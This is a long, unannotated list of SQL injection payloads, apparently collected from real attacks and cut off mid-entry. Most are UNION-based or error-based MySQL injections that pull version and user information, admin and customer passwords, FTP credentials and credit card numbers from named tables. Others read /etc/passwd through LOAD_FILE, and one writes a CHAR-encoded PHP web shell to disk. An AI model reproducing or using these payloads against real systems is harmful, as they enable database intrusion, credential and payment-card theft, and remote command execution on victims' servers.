1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25 -- 18239776986986554 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,user(),version(),database()),20-- 1826 union select 1,concat_ws(0x0b,username,passwd),3,4,5 from user limit 1,1/* -18281 union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.tables 1829999 union select table_name from information_schema.columns where column_name like char(37,112,97,115,37) limit 0,1 -182 and 1=2 union select 1,2,3,concat(@@version,0x20,user(),0x20,database(),0x20,@@version_compile_os),5,6,7,8,9 -- 182UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13/* 182' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* -182 union select 1,2,3,4,5,6,7,8,9,concat_ws(char(58),user(),version(),database()),11,12,13,14/* -182' /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 -- -182 union select 1,2,3,4,5,6,@@version,8,9,10,11,12,13,14 -- -182 union select 1,2,concat_ws(0x3a,user(),@@version_compile_os,version())-- -182 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15-- -182 union select concat_ws(0x3a,username,password),2,3,4 from users limit 0,1-- -1830 union select concat_ws(0x3a3a,name,surname,login,password,stat),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from users limit 2,1 /* -183128 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,us(),8,9,0,1,2,3,4,5,6,7,8,9-- -1832 UNION SELECT 1,2,3,user(),5,version(),7,database(),9,10/* 1833 union select version(),concat(user(),0x3a,user()),database(),4,5,6,7 1834 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7 from user limit 1,1/* 18365 union select 0,1,2,3 from users/* -1839 union select null,null,null,null,null,null,version();-- -183) union select 1,2,3,4,5,convert(user() using cp1251),convert(version() using cp1251),8/* -183 union select 1,2,3,4,concat(admin_login,0x3a,admin_pass),6,7,8,9,10,11,12 from compteadmin/* -183 union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/* -183 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7-- 183 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -183 union select concat_ws(0x2F,user,password),2 from mysql.user/* 184843' and 1=3 union select 1,table_name,3 FROM information_schema.tables -- -1848 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,group_concat(blg_username,0x3a,blg_password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM staff/* 184-999.9 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(version(),user()),12,13-- -184 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,users.* from users-- -184 union select 1,2,3,4,5,6,7,concat_ws(0x27,login,password,name,privilege),9,10,11,12,13,14,15,16,17,18,19,20,21,22 from d_users limit 1,1 -184 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15 from users/* -184 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8 -184 union select 1,2,unhex(hex(concat_ws(0x3a,version(),database(),useR()))),4,5,6,7,8 184 union select 1,concat(login,0x3a,password) from user/* -184 union select 1,concat_ws(0x2f,version(),user(),database()),3/* -184 union select concat(password,0x3a,login),2 from users-- -184 union select concat_ws(0x3a,login,pass),2,3 from users-- -1854 UNION SELECT 1,2,3,concat_ws(0x3C42523E, user(), database(), version()),5,6,7,8,9,10,11,12 /* -1857 union select 1,2,3,4,5,6,7,8,9,10,11,12,VERSION(),14,15 from shop/* -1859' union select 1,concat_ws(0x2a,database(),version(),user(),@@version_compile_os) -- 185 AND 0 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12 -- 185' and 1=0 union select 1,2,3,version(),database(),user(),7,8 -- -185 Union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database()),11,12,13,14,15,16/* -185 union select 1,2,3,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),5,6,7 -- -185 union select 1,2,concat_ws(0x3a,uname,pword),4,5 from users limit 0,1/* -185 union select 1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,0,11 from phpbb_users where user_level=1 limit 0,1 -185 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12-- -185 union select 1,user(),version(),database(),5,6,7,8,9,10,11,12-- -185 UnIon selECt 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 -- 1860' union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11 limit 1,1/* -18613 union select 1,2,'3',concat_ws(0x3a,0x3a,uname,upass),5,6,7,8,9,10,11,12 from users where id=1/* 18646644 union select 1,2,3,4,5,group_concat(concat_ws(0x3a3a3a,name,password) separator 0x0a),7 from user 186-999.9 union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53 from INFORMATION_SCHEMA.TABLES-- -1869 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10-- 186 aNd 1=0 UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15 -- 186 and 1=0 union select 1,2,version(),4,5,6,7,8,9 -- 186 and 1=0 union select concat_ws(0x3a,cc_type,cc_owner,cc_number,cc_expires) from osc_orders where cc_expires=0910-- -186 union select 1,2,3,4,5,6,7 -- -186 UNION SELECT 1,2,3,4,5,6,7,8,concat(0x3C746578746172656120636F6C733D2238302220726F77733D223330223E,LOAD_FILE(0x2F6574632F617061636865322F73697465732D617661696C61626C652F64656661756C74),0x3C2F74657874617265613E),10,11,12,13,14,15-- -186 UNION SELECT 1,2,3,4,5,6,7,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 from mysql.user/* -186 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),6,7,8,9,10,11,12,13/* 186 union select 1,2,3,4,concat_ws(0x3,version(),database(),user()),6,7,8,9,10,11,12,13 limit 1,1/* -186 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,group_concat(0x0b,table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from information_schema.tables-- -186 union select 1,concat_ws(0x3a,customers_lastname,customers_password,customers_id),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from customers limit 1,1/* -186 union select 1,table_name,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,7 from information_schema.tables/* -18742' union select group_concat(version(),0x3a,user(),0x3a,database()) -- -1874 UNION SELECT T.L,T.P,'crackedbygroundhog',4 FROM (SELECT ROWNUM R,LOGIN L,PASSWD P FROM CO_USERS) T WHERE R=X -- -1875 union select concat_ws(0x3a3a,version(),user(),database()),2-- -18760 union select 1,unhex(hex(concat_ws(0x3a,version(),database(),user(),@@version_compile_os))),3,4,5-- 18768 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2 limit 1,1-- -18773 union select table_name,2,3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables limit 50,1/* -1877' union select table_name,null from information_schema.tables where table_name not in ('body','comments','D99_Tmp','Headlines','Headlines$','News_release','Paragraphs','Paragraphs$','Sysdiagrams','User12')-- -187 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10/* 187 union select 1,2,concat(user,':',password),4,5,6,7 from mysql.user/* -187 union select 1,2 from user/* -187 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -187 union select 1,concat_ws(0x3a,lname,fname,email),3 from administrators/* -187 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9-- -187 union select 1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* 1880 union select 1,2,3,4 from news/* -1884)) union select 1,2,concat_ws(0x3a,id,name,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tvigle_rf.be_user limit 20,1000 -- -18864 union select 1,2,3,4,5,6,7,CHAR(39,60,63,112,104,112,32,115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,32,63,62,39),9,10,11,12 from into outfile CHAR(39,47,1079,1076,1077,1089,1100,32,1087,1091,1090,1100,46,46,46,47,99,109,100,46,112,104,112,39)/* -18864 union select 1,2,3,4,5,version(),7,concat(nick,char(58),email,char(58),passwd),9,10,11,12 from busers where 1 limit 73,1/* -1887 union select concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7/* -18895 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,database(),18,19,20,21,22,23,24,25/* -188 union select 0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/* -188 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15- -188 union seLECT 1,concat_ws(0x3a,ID,LOGIN,NAME,PASSWORD,EMAIL),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from PLD_USER-- -188 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15-- -1890 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* -1894 union select 1,2,3,4,5,6,user,8,9,10,11,12,13,14/* 189-999.9 union select 1,database(),user(),4,5,6,7,8,9,10,version(),12,13-- -1899 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),11,12-- -189 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10 FROM INFORMATION_SCHEMA.TABLES -- -189 union select 1,2,3,concat(user,char(58),password),5,6,7,8 from mysql.user/* -189 UNION SELECT 1,2,3,concat(user(),char(58),version(),char(58),database()),5 189 union select 1,concat_ws(0x2a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12 limit 1,1 -189' union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4-- 18 and 1=0 union select 1111,2222,concat(login,char(58),passwd),4444,5555,6666,7777 from witexru3.dilers limit 1,1 -- 18 and 1=0 union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database() -- 18' aNd 1=0 /*!UNION*/ SELECT 1,2,version(),4,5 -- 18 and 1=1 order by 25FALSE 18 and 1=2 union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables/* 18 and 2=1 union select 1,group_concat(concat_ws(0x3a,username,password)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,77,88,99,20,21,22,23,24 from admin_users -- 18 AND ASCII(SUBSTRING((select y()),1,1))>x/* 18 and substring((select version() from information_schema.tables limit 0,1),1,1)=5/* 18 AND SUBSTRING((select y=1...3())>x=33...127-- 18' or (1,1)=(select count(0),concat((select concat(username,0x3a,passwd) from members limit 0,1),floor(rand(0)*2)) from (information_schema.tables) group by 2) -- 18 or 1=@@version-- -18 UNION SELECT 0,1,2,3,4,5,6,concat_ws(0x0b,user(),database(),version()),8,9,10,11,12,13,14,15,16 -18 union select 0,1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE()) using latin1),3,4,5,6,7,8/* -18 union select 1,2,3-- -18 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from users /* -18 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,unhex(hex(group_concat(TabLe_NamE))),27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_schema.tables group by table_schema limit 2,1 -- -18 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from admin/* 18 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x0b,version(),user(),database()),11,12,13,14,15,16,17,18,19 -18 union select 1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(concat(login,0x3a,password),0x71),0x71),10,11,12,13,14,15 from users/* -18 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -18 union select 1,2,3,4,5,6,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version()),0x71),0x71),8,9,10,11,12,13,14,15,16,17,18,19,20,21/* -18 union select 1,2,3,4,5,6,concat_ws(0x3a,database(),user(),version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -18 union select 1,2,3,4,5,6,convert(concat_ws(0x3b,password,user,database())using latin1),8 from mysql.user/* -18 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database(),@@version_compile_os) ,7,8,9,10,11,12-- 18 union select 1,2,3,4,concat(email,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from TblMember/* 18 union select 1,2,3,4,concat(user(),0x3a,version())-- -18 union select 1,2,3,4,concat_ws(0x3a3a,admin_id,admin_firstname,admin_lastname,admin_email_address,admin_password,admin_type),6,7,8,9,10,11,12,13,14,15,16,17 from admin -- 18 UNION SELECT 1,2,3,4,CONCAT_WS(0x3a,version(),user(),database()),6,7 LIMIT 1,1-- -18' union select 1,2,3,4,unhex(hex(concat_ws(0x0b,version(),user(),database(),@@version_compile_os))),6,7,8,9-- -18 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18 -18 union select 1,2,3,4,version(),concat(@i:=0x00,@o:=0x0d0a,benchmark(141,@o:=CONCAT(@o,0x0d0a,(SELECT concat(table_schema,0x2E,@i:=table_name) from FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o) -- -18 union select 1,2,3,concat(0x2a,user(),0x2a,database(),0x2a,version()) -18 union select 1,2,3,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),5,6 -18 union select 1,2,3,count(*),5,6,7,8,9,10,11,12 from dc_orderhead-- -18 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8-- -18 union select 1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),4,5,6,7,8,9,10-- -18 union select 1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9,10,11,12/* -18 union select 1,2,concat_ws(0x3a3a,version(),database(),user()),4,5,6,7,8,9,0,11,12,13,14,15-- -18 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -18 union select 1,2,user(),4,5,6/* -18' union select 1,concat(table_name,0x3a,column_name),3,4,5 from information_schema.columns/* -18 union select 1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12 from parking.users -- -18 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8-- -18 union select 1,concat(version(),0x3a3a,user(),0x3a3a,database()),3,4/* -18 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,group_concat(0x0b,email,0x3a3a,name),7 from KT-- 18 union select 1,concat_ws(0x2a,version(),database(),user()),3,4,5,6,7,8,9,10,11 limit 1,1 -18 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5/* -18' union select 1,concat_ws(0x3a,user_id,username,password,email),3,4,5 from doctor_almi.av_users/* -18 union select 1,concat_ws(0x3a,username,password,firstname,lastname,permissions),3,4,5,6,7,8,9 from hi_admin limit 0,1-- 18' union select 1,concat_ws(0x3a,user(),version(),database()),3,4 -- 18 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5/* 18 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6-- -18 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12-- -18 union select 1,concat_ws(version(),database(),user()),3,4,5,6-- -18 union select 1,database(),user(),4,version()/* -18 union select 1,group_concat(name,char(58),pass),3,4,5,6,7,8,9,10,11,121,3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin -18 union select 1,group_concat(user,0x3a,pass),3,4 FROM users-- -18 union select 1,group_concat(user_login,0x3a,user_pass),3 from users-- -18 union select 1,photo2,3,4,5,6,7,8 FROM catalog -- -18 union select 1,unhex(hex(table_name)),3 from information_schema.tables -- -18' union select 1,user(),3,4,5,6,7,8,9/* -18 union select 1,username,3,4,password from users/* -18' union select 1,version(),3,4,5-- -18 union select 1,version(),3,4,5,6,7,8 -- 18 union select 1,version(),3,database(),5,user(),7 -- -18' union select 1,version(),username,4,5,6,7,8,9,10,11,12,13,14 from users/* -18 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),2,3,4,5,6/* -18 union select concat(username,0x3a,password) from ecsusers limit 0,1 -- -18 union select concat_ws(0x3a,id,email,pwd,validation_key,valid,created,phone,fullname,lastvisit,pay_vat,type_pers,bill_to,ship_to),2 from users limit 6,1/* -18 union select group_concat(email separator '
') from sjudb.events -- -18' union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,user(),database(),25/* -18 union select version(),2,3,4,5,6,7,8,9,10,11,database(),13,14,15,16,17,18,19,20/* -190094 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,table_name,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 from information_schema .tables/* 1900-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -1900 union select 1,2,3,4,version(),6,7,8,9,0,11-- 1902' or 1 group by concat(version(),floor(rand(0)*2))having min(0) -- -1902 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15/* 1903 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9-- 1904 union select 1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8 limit 1,1/* -1904' union select 1,2,3,4,concat_ws(0x3a,user,password,host),6 from mysql.user limit 10,1/* -19060 union select 1,2,3,4,5,6,7,convert(concat(database(),char(58),user(),version()),char),9,10/* -19062 union select 1,2,3,concat_ws(0x3a,password,login,is_admin),5,6,7,8,9,0,1,2,3,4,5,6 from u32388.vip_users limit 0,1/* 190' and 1=0 UNION SELECT 1,2,3,version(),5,6 -- -190 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a,id,username,password),9,10,11,12,13 from back_users limit 2,1 -- -190 union select 1,2,3,4,group_concat(0x0b,login,0x3a,password) from redcross_sql.b_admin -- -190 union select 1,concat_ws(0x0a,version(),user(),database(),@@version_compile_os),3-- -190 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9 from cms_users-- -190 union select concat_ws(0x3a,0x3c2f7469746c653e,version(),database(),user()) 1912 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,version(),user(),0x596f75207265636c616d613a29)),1,63), FLOOR(RAND(0)*2))) -1913 union select 1,2,3,group_concat(0x0b,table_name),5,6,7,8,9,10 from information_schema.tables -- -1918 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables group by table_schema limit 1,1 -- -1919 union all select 1,2,3,4,5,6,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),8,9,10,11 -- -191 and 1=2 union all select aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)-- -191 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,2,23,24 from information_schema.tables -- -191 union select 1,2,3,4,5,6,TABLE_NAME,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES-- -191 union select 1,2,3,4,concat_ws(0x3b,version(),user(),database()),6,7,8 -- -191' union select 1,2,3,concat(username,char(58),password),5,6,7 from usr -- 191 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11 LIMIT 1,1-- -191 union select 1,concat_ws(0x3a,id,username,email,password),3,4,5 from members limit 1,1 -- 191' union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables limit 47,1/* -191 union select 1,version(),@@version_compile_os,4,database(),6,7,8,9,10,11,12,13,14,15 191' union select concat_ws(0x3a,version(),database(),user()) limit 1,1/* -1921 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -1921 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 19226 or (3,3)=(select count(0),concat((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables limit 17,1) limit 2,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- 19285 union select 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /* -1928 union select 1,concat_ws(0x3a3a,name,pass,uid,permiss),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from users -- 192 AND ascii(lower(substring((SELECT concat(name,0x3a,password) from user LIMIT 1),1,1)))>1 -192 UnION aLL SeLEcT 1,2,3,concat_ws(CHAR(32,58,32),user(),database(),version()),5-- -192 union select 1,2-- -192 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,concat_ws(0x3a,version(),database(),user()),68,69,70,71-- -192 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15-- -192 union select 1,concat_ws(char(58),user(),database(),version()),concat(user,char(58),password),4,5,6,7 from mysql.user/* -192 union select 1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -192 union select 1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -192 union select 1,user,password,4,5,concat_ws(char(58),user(),version(),database()),7 from mysql.user/* -192 union select concat_ws(0x3a,version(),user())/* -1930' union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database())/* 1932' and substring(@@version,1,1)=5 -- -1932' uNiOn sElEct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 -- -1935 union select 1,2,3,concat_ws(0x3A3a,user,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from mysql.user/* -193676 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -1936' union select 1,2,user(),4,5,6,7,8 -- 19397 and (select 1 from (select count(0),concat((select concat_ws(0x3a,database(),version(),user())),floor(rand(0)*2)) from information_schema.tables group by 2)a)-- 193 and substring(y(),1,1)=x -193 UNION SELECT 1,2,3,concat_ws(0x3a3a,admin_login,admin_psw,admin_name,admin_mail),5,6,7,8,9,10,11,12,13,14,15 from tbl_admin -- -193 union select 1,2,3,group_concat(column_name separator 0x7c),5,6,7,8,9,10 from information_schema.columns where table_schema=0x746f78696374775f6d75747475676c79 and table_name=0x6f7264657273-- -193 union select 1,2,concat_ws(0x40,user(),database(),version()),4-- -193 union select 1,2,concat_ws(char(58),version(),user(),database()),4,5,6,7,8,9,0,11 -- -193 union select 1,concat_ws(0x3a3a,user(),database(),version()),3,4,5 -- 1940' union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14,15,16,17,18,19,20,21,22,23 limit 1,1/* -1941' union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3,4,5,6,7,8 -- -194213 union select user,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from mysql.user -1947 union select concat(Username,0x20,Password),2,3,4,5,6,7,8 from tbladmin-- -194 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from "list of species in the program" -194 union select 1,2,3,4,5,6,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20-- 194' union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9/* -194 union select 1,2,3,4,concat_ws(version(),user(),database()),6,7,8,9,10 -- -194 union select group_concat(table_name) from information_schema.tables group by table_schema -- -195068 union select 1,2,concat_ws(0x3a,ftpurl,ftpuser,ftppass) from ftpsecure-- -1950 union select 1,2,concat(user(),char(58),VERSION()),4,5,6/* 1955 union select 1,2,concat(username,0x3a3a,password),3,5,6 from user/* 1955' union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5 limit 1,1/* 1957 union select 1,concat(username,char(58),password),3 from probid_admins/* 1959 and 1=0 union select 1,group_concat(table_name separator '
') from information_schema.tables where table_schema=database() -- -1959 union select 1,2,3,4,5,6,7,user(),9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* -195 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 195 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 LIMIT 1,1/* -195 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,ID,USER,PASS),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85 from USERS -- -195 union select 1,2,3,4,5,6,7,8,LOAD_FILE(0x2F6574632F706173737764) -- -195 union select 1,2,concat_ws(0x3a,password,email_addr,user_name,password_hash,last_name,first_name),4,5,6 from user limit 1,1/* -1961 union select concat(user,0x3a,password,0x3a,host) from mysql.user limit 1,1/* -1964 union select 1,concat_ws(0x3a,LOGIN,PASSWORD),3,4 from b_user limit 0,1/* 1967 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.tables -- 196 and 0=1 union select 0,1,2,group_concat(username,0x3a,password),4,5,6 from as_users-- -196 union all select 1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4,5,6,7 -- -196 union select 1,concat_ws(0x3a ,user(),database(),version()),3 196' UNION SELECT 1,version(),3,4,5,6,7,8,9,10 LIMIT 1,1# -196 union select concat_ws(0x3a,name,pass),user(),version(),4,database(),6 FROM authors limit 5,1-- -19702 union select 1,2,3,4,5,6,group_concat(username,char(58),password) from admin_login-- 19738000 union select 1,concat(email,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from users limit 32000,100/* -1973 union select concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9-- -1973 union select version(),2,3,4,5,6,7,8,9/* -197506' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,table_name,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114 from information_schema.tables -- -1975' union select 1,concat_ws(0x3a,user,password,file_priv),3 from mysql.user limit 0,1-- -197820 union select concat_ws(0x3a,user(),version(),database(),@@version_compile_os)-- -1978 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from film/* -1978 union select 